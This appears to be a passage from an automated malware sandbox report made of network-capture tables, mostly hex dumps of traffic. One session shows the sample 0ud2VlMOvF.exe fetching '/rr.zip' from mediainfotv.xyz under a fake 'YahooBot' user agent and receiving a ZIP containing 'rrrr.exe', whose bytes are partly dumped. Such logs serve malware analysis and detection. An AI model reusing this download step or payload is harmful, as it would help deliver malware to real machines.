                                                                                                                            2023-03-21 07:00:07 UTC2078INData Raw: a0 b7 0d f0 36 13 de 2e d2 db 66 78 03 19 95 86 69 5c dc 77 09 18 ef 4f a4 7e 78 a2 de fb 0f ec 07 9c d4 56 36 0c 3f 9e 6c 2b 84 7f bf 86 7f fb e1 df c7 f0 ef 3d f8 c7 e0 5f 17 fc 33 03 27 9f 5f 0b 28 c8 c4 69 a0 c7 a3 2c ec a5 9e 0d 1f f0 16 35 e0 cd 34 e0 cd 1c f6 e6 6e 5b 93 d1 92 bd 06 c8 51 ea 75 78 ec 80 dc 96 01 6f 71 61 6f d3 90 c9 fa 63 4a e8 31 47 7f ac 67 c2 80 ec 06 63 10 30 82 03 68 82 d1 1a f6 32 de c3 ad 98 3d b6 55 63 6d 92 09 26 c6 e0 55 e4 4a a5 c5 dd 14 eb fe 2a 80 97 ae 28 e7 c4 98 52 75 74 99 7f 2d cc ca 26 97 65 b5 92 67 2b b2 37 dd e7 78 0b c9 b1 5f dc 94 e9 32 52 5c a6 37 66 a1 46 78 83 df bc 1d 0d d3 19 ff 4a 2e 26 2b 4b ad 30 e5 9a 65 a3 df 04 93 55 da 67 30 4f c9 ab 6c fe 38 98 7f 84 b4 26 39 cf 86 53 d9 52 1b 18 bc e6 95 ab 57
                                                                                                                            Data Ascii: 6.fxi\wO~xV6?l+=_3'_(i,54n[QuxoqaocJ1Ggc0h2=Ucm&UJ*(Rut-&eg+7x_2R\7fFxJ.&+K0eUg0Ol8&9SRW
                                                                                                                            2023-03-21 07:00:07 UTC2094INData Raw: 6a 84 b9 cd 6f 15 f6 d5 15 3a d9 5f bb 51 07 b8 03 aa 64 8a 8b 69 50 63 38 77 4b 94 0e ff 48 74 52 1c 16 b5 c0 ca 76 a2 1d 39 57 05 4c 95 56 c3 b6 af f4 ef 27 85 5d 0b ac 39 90 55 89 85 39 44 4c 74 ff 12 66 fe 58 98 5d 8c 31 fe b9 ee ab 0c 98 79 6b 3a 08 74 ad 01 90 28 87 d8 cf 71 ec 81 a6 9f ab 4a c3 dc f3 ae 01 cf fa d0 8e 79 0c cf 97 10 de ff e0 ad 1d d8 cf 72 ac 1e 6c 03 e7 05 83 45 b1 28 b9 01 a5 b0 4f ab 76 fb d9 56 4b 78 14 53 c5 91 84 9f 85 28 30 0b 88 65 86 ea f5 56 83 b9 2d ef 5c 8b 7f 3d af e1 df bd f9 f4 77 07 fd 5d 43 7f 97 d0 df 15 f0 97 ed 58 01 d2 ef 7d ae 1b 63 71 ee ad c0 94 e7 ff 07 74 aa 67 21 3c da bb a5 34 f6 9b ff 09 aa eb f8 23 60 73 ec 7d 0c 20 06 31 5e f1 3c 8c 86 3d 0c 4d 5c cc bd 75 04 7e 3d b0 e6 48 ab 4a d8 af cf 00 5f df b4
                                                                                                                            Data Ascii: jo:_QdiPc8wKHtRv9WLV']9U9DLtfX]1yk:t(qJyrlE(OvVKxS(0eV-\=w]CX}cqtg!<4#`s} 1^<=M\u~=HJ_
                                                                                                                            2023-03-21 07:00:07 UTC2110INData Raw: 91 5f 40 90 46 2b 32 51 4e 8d 9a 02 72 29 5a 61 3a 58 91 a3 0a ac 71 9b f0 a8 47 fc 8a f6 ca 4c 90 46 24 24 73 74 7e 82 94 4a 85 89 27 03 60 93 26 b4 94 8d 34 d9 0c a4 bb 13 b0 7a 68 5f 92 3c b0 f2 77 35 3d 97 50 fd d4 0f d4 1c b4 0d 50 b1 36 dc 35 a4 37 8e 39 e9 e8 cf 24 fe 86 52 79 91 60 04 47 ab 32 f1 1d 9d bd d1 55 06 a4 93 d1 d5 65 32 a5 1f 11 e5 0a 5c 46 1d 5d cd 51 26 9d 32 66 55 ec 99 4c 6a dd a1 ba 21 41 5f d7 3d 79 9b 52 f9 7b cd a7 f2 37 6e 26 93 cd 7b 32 16 b3 4d 7d 15 19 b8 a2 7f 07 14 3d 0a 77 aa e1 5a 7f d4 b6 9f 36 ad 1e 8d da 7a 94 b6 29 5b e2 92 79 75 7c c2 05 3c f6 cc 76 f4 a0 0d 0f 3f 07 9d 67 cd 91 26 e0 e7 2c 72 41 40 aa 47 8d 74 e0 ee ab 6e 0c 1c 05 a3 c1 e7 d4 a6 ec ea cd 54 06 62 3d 19 9c e5 cf 47 d7 76 3e a7 f2 30 c8 91 da d8 ba
                                                                                                                            Data Ascii: _@F+2QNr)Za:XqGLF$$st~J'`&4zh_<w5=PP6579$Ry`G2Ue2\F]Q&2fULj!A_=yR{7n&{2M}=wZ6z)[yu|<v?g&,rA@GtnTb=Gv>0
                                                                                                                            2023-03-21 07:00:07 UTC2126INData Raw: e7 7d f9 4a e7 0b 76 f1 fb 6a a5 3f 5f 79 54 3b de 83 e3 e7 b5 e3 09 1c 8f 69 c7 8b b7 e4 2b 9f 6b c7 51 1c e7 bf 28 8f 9b 96 5e f6 ef 0f b9 bf ad 3c a8 e6 d2 fc f9 27 ed ce 97 ed 0a 25 7d 1c bf f9 74 e6 dd 06 1b b2 66 89 f8 41 a9 ae ae a1 ff ff e7 ec 01 8c a9 28 0f 5f 30 0d ae 4a 57 ce b5 a7 8b fe 56 b8 7f e5 2f 17 7c fc a7 f7 42 03 5f f1 3f f8 ab 32 af bb c8 2f 08 e0 7e b6 51 db f2 66 61 d0 bb 39 31 0f e7 fe 7c e5 bc 37 3f 7e 5e ec 33 57 c5 98 ac e6 2b 31 7d 4c f7 3f f8 90 b6 07 b5 31 0d 7f 82 b0 2b 53 f5 38 ae 05 27 c2 1b 0d be d8 c6 92 c2 97 31 1d 7f 46 61 b7 3b c9 d7 3e 84 fb c1 90 16 3f 9a c6 17 a7 9b 4c 53 e6 71 35 f1 3c 27 0d fe 8c 9f bc 27 70 5f 6b 49 b4 9d 89 f0 1c 2d 2e ef 89 d4 fe 8d 69 f8 53 00 3b 77 92 1f 2f c2 6d 5a 5c 41 1a 3f ee 24 3f bb
                                                                                                                            Data Ascii: }Jvj?_yT;i+kQ(^<'%}tfA(_0JWV/|B_?2/~Qfa91|7?~^3W+1}L?1+S8'1Fa;>?LSq5<''p_kI-.iS;w/mZ\A?$?
                                                                                                                            2023-03-21 07:00:07 UTC2142INData Raw: 5f e5 ba b2 46 f5 82 32 86 69 43 35 4b ee 8f 3a 59 4d a5 62 f4 37 a8 76 74 77 3a 8a 1e 0e ba 98 42 ef a2 8f d2 f9 98 10 26 93 d9 c6 fa 73 c9 50 ab e2 18 63 2d 9e c7 a8 26 f1 8b f8 cf 7c 80 70 5e 38 23 f6 91 fa 2b 4b 94 cf 8a 02 3f 59 a5 96 d2 9a 6b 63 b4 c9 1a 65 ec 36 ef b7 db 59 1e 5b 9f 6d 21 bd 48 b2 f5 8e 00 d9 4d 8e a1 1e 05 4a 83 82 36 a2 9a 53 ad c1 8c a1 54 2f aa 3f d6 61 24 92 f1 64 6a 36 98 77 2d b5 0d eb b1 9f 3a 41 5d a0 b2 cc bb 85 5f 29 5b 74 7b 61 64 65 6f ba 1f 3b 90 5d c7 ee 67 17 0a cb c1 88 cf 85 eb e2 6d f1 a5 f4 0e 33 60 55 bf 4b b2 9d e2 a6 78 28 8c a2 2b 7e 4a 6b a5 b3 d2 1d 84 33 5e 49 51 d6 29 47 95 0c 93 70 5e 82 70 44 b5 ae 1a ae f6 53 c7 a9 53 d5 3d 6a 47 2d 0a 4c 73 52 bb ab 3d d3 f2 99 9a 54 09 0a 14 aa 0f d6 d7 80 01 8a 1b
                                                                                                                            Data Ascii: _F2iC5K:YMb7vtw:B&sPc-&|p^8#+K?Ykce6Y[m!HMJ6ST/?a$dj6w-:A]_)[t{adeo;]gm3`UKx(+~Jk3^IQ)Gp^pDSS=jG-LsR=T
                                                                                                                            2023-03-21 07:00:07 UTC2158INData Raw: 8a b2 52 c6 7e af e3 8d 07 46 07 cb 17 a5 a1 56 cc 65 7c 45 65 69 68 5b fb db dd f6 b7 56 fe 8d 14 34 3a 26 2e de ea bd 6f 9a 12 ea 0f b0 b7 7a ef 85 57 a6 c5 9c df ca 46 f4 c3 fd 8c 79 f3 b4 b7 a4 1b 4c 88 ca f7 e3 7f 28 0d 13 99 5a 44 39 ab e2 d9 67 06 e2 96 03 b8 e7 69 5b 72 23 cb f0 3c 3c bc 38 30 d5 c2 6a 6d 75 8e 14 4a df ca 8e 1a 88 bb 11 40 49 fd 4b a7 ca c0 37 84 f8 4a 79 5f a3 b2 e2 8e 83 a1 54 bd 8d 4d 72 01 9f 5d 88 04 56 58 0c b8 cc 4e a6 2a 51 1c 1b 49 02 08 4a 3a f1 3c 9c d1 27 2e 9c 7f 0c 30 8f 4b 17 a5 cb d9 35 64 c7 25 8e 1d 4e 14 8d 25 04 02 89 5d 7c 93 76 4c 77 9f bb b0 d2 34 9a 52 95 2f ac 4c 97 a4 66 f7 87 22 3e e7 41 51 ac 07 ee 12 a6 b4 52 98 57 0b ee 64 98 75 f5 d5 ba 56 78 b3 b2 3d 89 b6 4b 3d 7b 00 22 56 b2 77 00 53 ae 9a 30 ee
                                                                                                                            Data Ascii: R~FVe|Eeih[V4:&.ozWFyL(ZD9gi[r#<<80jmuJ@IK7Jy_TMr]VXN*QIJ:<'.0K5d%N%]|vLw4R/Lf">AQRWduVx=K={"VwS0
                                                                                                                            2023-03-21 07:00:07 UTC2174INData Raw: c4 f6 64 df 26 f6 58 f6 55 62 4f 60 5f 24 b6 82 7d 9a d8 6a f6 51 62 7b b0 1b 89 ed c7 ae 23 76 00 9b 47 84 9b 10 6b 5e 08 bb 9c 78 85 b3 4b 88 1d c9 ce 27 76 14 1b 43 6c 03 3b 83 d8 73 d8 30 62 cf 65 b5 c4 5e c0 aa 88 bd 88 1d 4f ec 64 76 24 b1 53 d9 c1 c4 ce 60 fb 11 3b 9b ed 45 6c 23 2b 24 f6 6a f6 0e 7e 11 23 6f 2d 7b 63 17 87 02 d9 8a 62 7f 46 df 03 b8 e7 cf 7e 4b 5e 89 ae f4 57 e4 15 c5 1f f6 28 79 c5 c3 69 ec 87 e4 95 e8 bf bf 4d 5e f1 02 75 76 17 79 45 8d 6c 76 1b 79 c5 b3 fe 6c 29 79 dd 8d af 1b c8 2b f9 d0 c5 2a 92 f7 84 85 9d 1a c5 e8 cd 38 69 1d c9 36 10 c8 68 73 76 91 8b 17 45 5a c7 05 bc cf 14 e2 93 27 d6 7a 2f d2 72 4b 92 0a f4 e9 02 64 1d 13 21 d1 3a 26 f3 69 fa 70 50 64 5a c7 54 de a7 f5 65 e2 e3 0a b3 70 de e7 2a e7 e3 ae 75 cc e6 7d 6a
                                                                                                                            Data Ascii: d&XUbO`_$}jQb{#vGk^xK'vCl;s0be^Odv$S`;El#+$j~#o-{cbF~K^W(yiM^uvyElvyl)y+*8i6hsvEZ'z/rKd!:&ipPdZTep*u}j
                                                                                                                            2023-03-21 07:00:07 UTC2190INData Raw: c8 1d 58 53 0c 1d d0 5b e9 ad f4 52 29 15 e4 f7 20 38 35 0a 5f 85 46 e9 a7 56 a8 7c 1e 54 14 16 d9 e1 3d 75 8a 72 b0 62 20 87 b7 cb 54 72 c8 25 47 ae 4f ca 5c 92 8a bb 6e 39 4a 99 a2 0f 57 8e 1e 50 8e a5 59 39 c9 ca 41 0a 77 ae 00 7d c3 66 e9 67 85 cf 92 87 85 ca a3 d2 56 a4 19 53 92 95 0f 28 c6 72 98 0d e7 c3 62 22 43 27 2a e5 78 a6 45 1e 63 4c 5a 91 8d b7 d5 c7 e0 0d ec 39 8a 0d 82 11 f6 35 2a 70 a4 84 1b 04 52 68 7c 81 b3 c3 06 81 80 6a 68 08 fc e1 9c af f8 d8 50 bf f7 66 c7 4c 59 31 e2 fa bb 47 9d 44 cb 5f bc bb c1 68 08 cb af da f1 f1 b0 99 b7 1d 56 8e 7e f7 d7 b0 5a d3 e6 c8 d6 2b d2 67 1e 7a ce b2 fd fb 57 77 f5 d1 7a 84 bb d3 8f ae 7e 65 40 5a db 34 f7 dd 3f 7e bc 60 66 db a3 0f cc 79 c8 d0 f4 f5 cd 13 8f 5f 79 76 cd b9 ef d7 6c 3d f7 b4 aa ad 8f
                                                                                                                            Data Ascii: XS[R) 85_FV|T=urb Tr%GO\n9JWPY9Aw}fgVS(rb"C'*xEcLZ95*pRh|jhPfLY1GD_hV~Z+gzWwz~e@Z4?~`fy_yvl=
                                                                                                                            2023-03-21 07:00:07 UTC2206INData Raw: 8a 48 8b 2a 12 24 2c 9a 0b 15 be a8 75 b7 5a 4c 53 76 88 b1 99 ea fa d8 7e 74 ec 78 74 cf 50 74 56 cf 31 ec 22 67 dc 2d e9 7a 1f 01 d5 b3 83 8a a2 65 fa 25 e3 39 9d d3 f5 70 ee 31 7d b3 4d 0b 92 7e f8 c6 d8 ed c7 09 0d d2 68 76 ef e0 62 77 3c 44 ea 8a 4f b3 b4 90 c2 e4 e8 d7 4e 06 fd 2d ea e7 ab 13 9c 76 c0 07 90 82 72 c1 62 cf 4d b9 f8 3b aa fa 8b 9c 77 1b 13 19 fc 28 c7 3b 5f 36 0e 4d a5 64 39 5b bc 41 1c 91 96 7a 20 ad 92 cb 6e 3c 6a 9c 99 95 9b f9 6e 81 a9 d7 e0 a6 5b be c3 06 54 f9 a4 7f f7 96 98 3b 25 07 5e 03 79 43 d3 85 06 8e 96 ac 2c 9a c9 11 4a 9d 84 d2 1c 2e 9b fa b9 36 16 28 e8 bd 90 b3 e4 59 80 3c bd ec 12 e2 32 70 21 40 e0 00 5f df 5b df 70 be 13 7c 1b 4a 06 8f 5f a8 73 53 b4 4c d9 d0 fa 0c 10 a7 35 e0 84 0b c0 f9 d2 02 d4 b0 01 b3 d8 e2 cc
                                                                                                                            Data Ascii: H*$,uZLSv~txtPtV1"g-ze%9p1}M~hvbw<DON-vrbM;w(;_6Md9[Az n<jn[T;%^yC,J.6(Y<2p!@_[p|J_sSL5


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                            1192.168.2.449696198.54.121.245443C:\Users\user\Desktop\0ud2VlMOvF.exe
                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                            2023-03-21 07:00:09 UTC2213OUTGET /rr.zip HTTP/1.1
                                                                                                                            User-Agent: YahooBot
                                                                                                                            Host: mediainfotv.xyz
                                                                                                                            2023-03-21 07:00:09 UTC2213INHTTP/1.1 200 OK
                                                                                                                            keep-alive: timeout=5, max=100
                                                                                                                            content-type: application/zip
                                                                                                                            last-modified: Sat, 18 Mar 2023 18:44:46 GMT
                                                                                                                            accept-ranges: bytes
                                                                                                                            content-length: 2804064
                                                                                                                            date: Tue, 21 Mar 2023 07:00:09 GMT
                                                                                                                            server: LiteSpeed
                                                                                                                            x-turbo-charged-by: LiteSpeed
                                                                                                                            connection: close
                                                                                                                            2023-03-21 07:00:10 UTC2213INData Raw: 50 4b 03 04 14 00 00 00 08 00 23 ac 72 56 60 52 88 46 ca c8 2a 00 7b 76 9f 50 08 00 00 00 72 72 72 72 2e 65 78 65 cc bd 0b 5c 94 c5 fa 38 fe ee 05 58 70 75 57 45 a5 c2 a4 5a 3b 1a 6a 10 56 2a 58 cb 65 11 2f e8 2a 82 57 34 2f 20 92 b7 03 bb 5e 12 14 5a 28 5e a6 2d ea e8 39 75 ba 69 da 39 9d 6e 87 2e a7 d0 ac 16 16 b9 a4 25 a2 29 8a 25 19 d5 e0 52 91 92 ae 82 be ff e7 99 79 77 59 cc 4e f5 fd 7d 7f ff cf cf 62 67 de b9 3c f3 cc 33 33 cf 3c f3 cc cc 33 c9 f3 cd 82 52 10 04 b5 a0 13 24 49 10 2a 04 fe cf 28 dc 28 fc e6 3f 85 20 ec d5 0b fd 86 bd 1b f8 e9 2d 15 8a 69 9f de 52 56 36 3b 6b 65 6e d8 ba 9c b5 2b 72 96 ac 0e 5b 6d cd b5 84 2d cd 08 cb b1 ae 09 b3 ae 59 9e 91 13 36 67 e5 9a a8 bb fa 06 19 ee fd 35 90 89 d3 52 a6 9a e6 cd 4e 48 9d 3c 6d ce cc d8 99 f3
                                                                                                                            Data Ascii: PK#rV`RF*{vPrrrr.exe\8XpuWEZ;jV*Xe/*W4/ ^Z(^-9ui9n.%)%RywYN}bg<33<3R$I*((? -iRV6;ken+r[m-Y6g5RNH<m
                                                                                                                            2023-03-21 07:00:10 UTC2229INData Raw: f2 79 f8 0a 62 5f a9 ba a2 76 f8 72 bd 63 b7 fe 13 72 89 07 6c 97 f5 98 8f e5 ca 3c ef 9b 6b 6e af 5c 53 e0 ab ed 21 3c 03 7a 29 45 57 8c 0f e2 b0 43 e6 4e f6 89 87 b4 33 6d e3 14 eb 75 62 15 92 da 8e 66 7f ac 1d ae 29 91 f5 3c 41 2c 4a e9 35 af eb de ab 73 4d fc 68 5b bc 51 70 f9 7d d4 09 8e ca da cd e2 6f c1 78 c8 da 9e 02 b5 92 8e 2d 20 d6 76 b1 c3 d5 87 c5 f9 b1 bc 81 17 2c 6f 93 e9 dd d1 c9 a7 36 28 9c 24 f9 14 87 db 86 67 8a 6b a0 7f de e5 80 b0 af 19 93 98 21 5e 1a f9 d3 62 88 37 eb 8a eb f1 54 1a 9e d7 60 d5 82 3a b7 3d 7c 4e 92 de 57 b8 94 ef 0b 62 cd 3b 42 c1 a5 49 96 fb df 51 14 5c 32 59 c6 bd a3 2c b8 94 68 19 f0 8e aa e0 d2 74 0b 14 9d ac 2b 46 e3 ef ef a8 2b d0 0a 0f 10 6b 7c d5 fa e1 7b d9 23 57 97 92 ad 37 e9 de 1b 54 80 bb 5c 03 88 e9 d4
                                                                                                                            Data Ascii: yb_vrcrl<kn\S!<z)EWCN3mubf)<A,J5sMh[Qp}ox- v,o6($gk!^b7T`:=|NWb;BIQ\2Y,ht+F+k|{#W7T\
                                                                                                                            2023-03-21 07:00:10 UTC2245INData Raw: 34 83 9a 1c 9d 95 ad c8 ba 57 8d 6c 37 6e 9d 24 cd 9b cf e6 7a 5b 75 35 5b 9c 1e c1 1e 56 0d f2 1a 4a b3 54 34 b2 0d 79 f4 d7 c2 8c af e3 ae 86 0d 87 6a e0 cc 59 09 6c 78 5f 5e 8b 6c 27 c6 73 67 d5 23 8b b9 99 d2 a5 9b 1f ff 1a 33 8f 8f ef 80 1f bc 52 49 72 a7 9d ab a0 5e bd e2 39 08 9a d5 c5 fb 4b e7 02 79 71 26 9b 14 36 75 ea de 9f 36 f7 2a 44 e9 de 9f 0d 6e 0d 3b cb 19 3f c3 fa 4d 54 3d e3 c3 37 49 f2 a5 a8 e4 0e 0e e9 29 80 94 ad 24 10 04 33 38 0c 2f b3 e7 e4 b8 75 2d 2f e2 49 46 ff 2d 4b 48 7e 47 54 b3 9c d2 a9 72 d8 d5 05 2a 53 87 37 f5 24 48 bd 73 1b 30 8e 68 53 fb 96 1b 49 2d 8c bd 9d 65 f0 89 a3 55 85 2f 5d ba e3 6d 5d 83 ac 1f e3 cf 60 0e c5 56 1b 34 c7 93 5d e3 bb 17 d7 ef 07 9f 91 b8 77 3e 5f e1 3d 9c 82 6d bb 3b 19 77 11 7b d9 b2 ee f5 50 27
                                                                                                                            Data Ascii: 4Wl7n$z[u5[VJT4yjYlx_^l'sg#3RIr^9Kyq&6u6*Dn;?MT=7I)$38/u-/IF-KH~GTr*S7$Hs0hSI-eU/]m]`V4]w>_=m;w{P'
                                                                                                                            2023-03-21 07:00:10 UTC2261INData Raw: 94 f2 d8 44 f4 ad 08 65 93 b4 f3 6d bb 42 ad 12 e0 7a 72 38 0b c2 55 32 6a 3d 05 6a 15 22 b5 19 08 55 21 69 e7 3f 12 35 da 3e 95 03 9c 3f 87 1b 81 70 e5 8c da 47 a7 d8 ec c8 81 85 c3 2b 3d 7b 71 b8 ae 52 e1 9e 28 d1 6e 87 8c 40 9e f1 2b de 67 b7 9d 11 b0 00 81 21 ec 0a be ad d0 e9 da b7 d2 64 5b 03 e4 35 b6 c1 57 d9 0a d7 40 11 7f 18 2e 6a cb 80 ce 4d 9c ce 36 a4 53 c6 e8 8c 01 3a dd ea 7d 93 68 6d f7 ca 9f 94 22 d5 7e 78 60 47 8a 96 7e 29 b4 6d 45 8b a1 ea 97 d9 e1 ca 27 32 ec 4b ac ff 9f 75 d6 b6 8d e2 7d 07 5c 19 14 6f ce d0 a7 2d 31 86 a7 65 0f a5 5d e4 bd cc f5 41 76 ce b8 13 e1 7a b9 c1 cd 1b 29 ac a5 c0 60 1f 47 e3 8f cb 13 38 9f 57 c6 c3 6c 6c 3e 4d 21 d9 b4 e5 30 df 0e cb 05 3e af 60 1f 9b 7b 0d 87 76 25 0c 88 ec 3a 89 03 e0 20 f6 b6 fd a4 38 08
                                                                                                                            Data Ascii: DemBzr8U2j=j"U!i?5>?pG+={qR(n@+g!d[5W@.jM6S:}hm"~x`G~)mE'2Ku}\o-1e]Avz)`G8Wll>M!0>`{v%: 8
                                                                                                                            2023-03-21 07:00:10 UTC2277INData Raw: e1 e8 3b a3 cb 4d 73 49 30 c4 1d be dd bc ee f5 81 65 fb 25 7d 11 85 1b ba b3 6c 9f 45 61 df 81 a9 b9 46 43 88 6b 2f 96 33 7e be b4 47 b0 45 42 d5 a7 ab db d9 40 a0 e1 ce 90 a1 96 63 26 cb 33 ef fc 01 2c 0b ef c4 55 6b f0 c7 8a 77 4f 66 f7 c5 2b 4e 31 c6 10 ef 72 a2 1c 4d 6d 93 7a 86 dd 0a 72 9b de 8c 5f db d0 5f 40 6a ab 8a a7 55 4f b5 49 4e e2 33 3d e3 ef 9b 8a 3f ea a3 05 bf f6 23 75 f0 71 43 7e 6d 31 df 32 f0 48 9d 7f b1 b3 cc 5e 95 39 b7 3f 5b cc e9 fd d9 d5 de 44 f2 b4 a7 c7 f7 67 8b 2d f8 6a 2c f6 79 f7 77 94 85 f4 39 36 02 55 ba f3 ee 7f e1 88 8d 19 c5 ce 8d 86 57 d9 b4 7b 0a 9a f7 f5 a6 ed f4 84 51 4f 07 46 8d cc c7 6a 0c 61 3e c7 bc 8f 78 7e c5 33 1e 5f 09 f3 79 16 82 dc e9 98 37 9a cf 3d 4f df 1a 43 78 db a6 2c 62 21 78 08 1d b6 17 b7 20 e4 93
                                                                                                                            Data Ascii: ;MsI0e%}lEaFCk/3~GEB@c&3,UkwOf+N1rMmzr__@jUOIN3=?#uqC~m12H^9?[Dg-j,yw96UW{QOFja>x~3_y7=OCx,b!x
                                                                                                                            2023-03-21 07:00:10 UTC2293INData Raw: ab 8f 32 f8 85 a2 ad 31 0f 32 89 35 28 2c 44 ef 1a 1a 14 eb 17 ed 15 1f 61 08 73 49 24 e7 2d 23 e2 0c b1 a0 7d 39 53 dc 7b 70 4c 22 f1 78 46 07 85 78 86 8d 8e 0d 8a 4d 74 4f 70 e6 52 65 93 23 85 d4 b3 10 b2 9f 38 3e 06 cd 62 38 b3 10 dc c8 ee 1c 12 82 2b f2 dc 57 5e d1 21 f1 11 7a 76 c3 b9 73 05 18 1e 5d c1 83 65 46 28 9b b2 31 31 02 09 8a 33 b0 db 68 b8 7a 99 b7 5d 62 14 6c 36 ae 94 e4 9e 8b a8 90 5e 61 b1 71 06 72 d7 08 c5 41 c8 71 6e ec b9 84 30 e3 2e 7b 6c 0d e8 25 92 3f b9 fb 22 94 14 2e c4 3d 21 58 1f 83 9d 06 01 6c c3 52 be 7a 92 9a 77 74 58 94 19 e2 1e 15 32 60 0c f7 31 e5 63 88 f0 8f c2 9d 06 f8 ae 0f 0a 31 c1 83 c2 e2 f4 a6 14 29 63 7b 85 b0 0d c1 f9 31 32 1a a9 34 fb fc 70 3b 80 f1 8c 8d b1 22 a4 0e dc 87 f1 71 fa 58 33 fe c2 57 fd f4 89 a3 a3
                                                                                                                            Data Ascii: 2125(,DasI$-#}9S{pL"xFxMtOpRe#8>b8+W^!zvs]eF(113hz]bl6^aqrAqn0.{l%?".=!XlRzwtX2`1c1)c{124p;"qX3W
                                                                                                                            2023-03-21 07:00:10 UTC2309INData Raw: cc 25 31 51 5b 9b 1d ab 7b ef 98 fb e5 83 f3 6f 7b 9c ef 28 f4 98 10 ba 5b 52 63 c2 99 98 49 7f 1e 74 7b 3d 3f f0 f6 e7 c0 9c 37 8f fe b8 b7 e3 98 ff ba 67 87 86 2f e8 c5 9c 5b 3d 21 39 a9 4f d5 85 9b e4 d6 ba ae 9b 0f 5f 5a 30 a8 7f 90 8d 6f d6 dc 41 a3 af 6c 75 9d 9c 74 a6 d7 91 93 ef f6 af 3c d0 64 76 c1 8a fb 83 db 5d 8e 9e fd f1 ac f3 e6 9a 6e 8a 27 5b 83 3c aa 65 45 28 de 1c da 6e 7d f7 6c 76 44 f8 df 53 c5 ad ed fa 85 05 76 2f e9 39 b9 b3 26 7d 6e 95 fa 67 c6 9f 8e 6f be 6f 46 e7 2c e5 ba d7 8b 3c f5 f7 56 14 16 57 f3 bd 33 60 fc 92 f3 3f df 3d 7d 42 ff c9 c7 c3 cd 76 55 a3 ac c5 ef 9f 3f 99 1e 1f b5 2e cc de 5e d5 38 78 5f ef 7a ed 23 9a e9 1a 50 1b 8a 9c 75 cd ef 94 dd 6d f4 47 d9 6a e1 9f 87 76 e8 2f 9c ad 65 e3 39 a8 96 61 fa 60 ef b5 97 f7 3d
                                                                                                                            Data Ascii: %1Q[{o{([RcIt{=?7g/[=!9O_Z0oAlut<dv]n'[<eE(n}lvDSv/9&}ngooF,<VW3`?=}BvU?.^8x_z#PumGjv/e9a`=
                                                                                                                            2023-03-21 07:00:10 UTC2325INData Raw: d1 78 00 64 7f 4a 5b ca c7 19 b4 15 d6 5b 1e 03 1e f0 d1 ca 83 f8 27 d9 f3 58 a9 93 75 68 a0 0b 8c 06 fc 95 a2 c6 03 bb 38 a4 3b ee 9d f9 00 e3 10 f8 38 e1 f8 58 ba 40 03 0c 4f 3a c8 0b 70 d1 b2 1a 6f 4b 2a 4e 62 de 23 88 f4 46 af ed e1 ff 96 56 5e a6 a5 e4 94 32 a9 8b 20 1a e1 a1 66 f4 c6 fa e2 ab a3 6f 6d da 4b aa ac 7c c3 a0 77 75 63 7f b2 b3 b2 1f c7 af df a0 ab 2a ce 65 eb 00 89 79 d9 10 76 89 4f d3 ec 08 a3 e9 55 9a 81 68 7c 07 ae 06 d8 46 98 c6 90 f4 de 3f f0 bc 57 1d 91 b2 ae 0a 20 88 a7 75 18 d1 0a 02 ea d4 bb c9 5b b7 c1 d8 3d a8 99 45 74 19 bf 14 84 dd 8f aa b3 99 72 46 8f da 54 f9 91 d0 ca 60 82 51 13 a3 99 0b 6f 38 10 4f f5 c6 c5 69 bf 2d ed 97 e0 fc 27 25 28 e2 a5 3e ab fc 2a f6 79 05 12 a9 fa f1 3d 82 63 36 c1 9d c8 4d e4 d4 16 6c 77 97 67
                                                                                                                            Data Ascii: xdJ[['Xuh8;8X@O:poK*Nb#FV^2 fomK|wuc*eyvOUh|F?W u[=EtrFT`Qo8Oi-'%(>*y=c6Mlwg
                                                                                                                            2023-03-21 07:00:10 UTC2341INData Raw: 11 90 ac 4f 53 cd ba ba a1 6d 04 f9 6c 92 94 5b 4c f5 93 63 23 fe 67 59 db 4b 73 3e 43 dc 45 20 9e f1 aa f2 c6 e0 bf b2 e6 e6 5e 27 0e 7c bd 6b ca ba df 26 19 57 04 45 2d 21 6b 67 f3 c0 fc f2 f0 29 36 fb 2d a8 24 8d ff 62 30 30 67 3b 81 bb 45 96 35 38 a8 2f a6 ae 5e 42 b0 3a 17 75 13 ea 81 d6 3c a7 40 b2 2c e0 0b 55 08 5e a1 a0 4c 98 2a b9 96 d7 b8 a1 5e 50 c0 af 87 b1 41 e7 f8 5b cb d3 fc bd b8 02 96 76 db 46 b1 0e 0a e2 10 4d 96 7d f7 08 c5 e8 b3 69 df 53 4d f7 22 2a ee 03 b6 5d 78 59 22 ac f0 48 b1 6e 84 a0 ef 69 09 66 49 9c 63 1d 48 c5 5e e3 65 1e 2e 3c 0b 69 47 3d 08 71 4a 37 80 f3 e8 6c c0 ca 47 dd 15 d1 b4 8b 88 81 a3 3d be 47 1f ba a5 b0 35 66 cc 9f fb 72 bd 4f af 04 8b 83 a2 9b ac 64 72 eb 05 ce 7a 3a 46 03 58 67 5b 9e ff 7f b0 1c 1b 50 c3 5a be
                                                                                                                            Data Ascii: OSml[Lc#gYKs>CE ^'|k&WE-!kg)6-$b00g;E58/^B:u<@,U^L*^PA[vFM}iSM"*]xY"HnifIcH^e.<iG=qJ7lG=G5frOdrz:FXg[PZ
                                                                                                                            2023-03-21 07:00:10 UTC2357INData Raw: 2a 00 5a 9d 6f a3 4c 6c 92 93 f5 53 d7 ed 22 1d 73 5e a2 b1 d3 9a 24 4a b5 4e 70 ee ab a5 ab 6d e4 b2 e9 55 8d e3 75 3e 05 38 a0 8a ff f9 a1 83 77 79 ae de 18 10 3e 79 7a fd 84 87 f0 1b e9 4b 63 ba df 6d 75 e6 53 2c 42 b2 23 62 72 da 4f 43 96 c5 f3 be 57 a0 6c 0d 24 fa f1 00 26 96 46 a4 37 46 5b be 01 2b 35 7d 5d e2 99 fb a9 5a d2 0c f8 33 df 80 bc e5 99 1c b6 4a 17 8f 9b 3d b4 e8 63 48 d9 ce 94 54 0a 14 a7 b7 6e 53 8e 0b 35 b6 03 7b 92 5c 5e 9b 79 b3 9d cb c5 0b 4b c2 8d eb d0 9d d2 94 44 91 d7 1c 6b 2e 42 0d 68 d7 b5 3d 45 99 06 f9 df 60 64 1a 66 34 03 70 e0 79 e3 6d 6e b9 a6 87 ed 4e 6a 8e f8 81 56 a5 5b af 8f f7 9f 2a 32 6b 3c a1 af 1c e1 40 2c 66 61 d0 24 97 e4 94 f8 94 77 09 d3 78 4e 99 34 31 96 63 88 3d b8 b8 8e 28 4e 79 fb 61 c3 6f 44 ad 06 a7 13
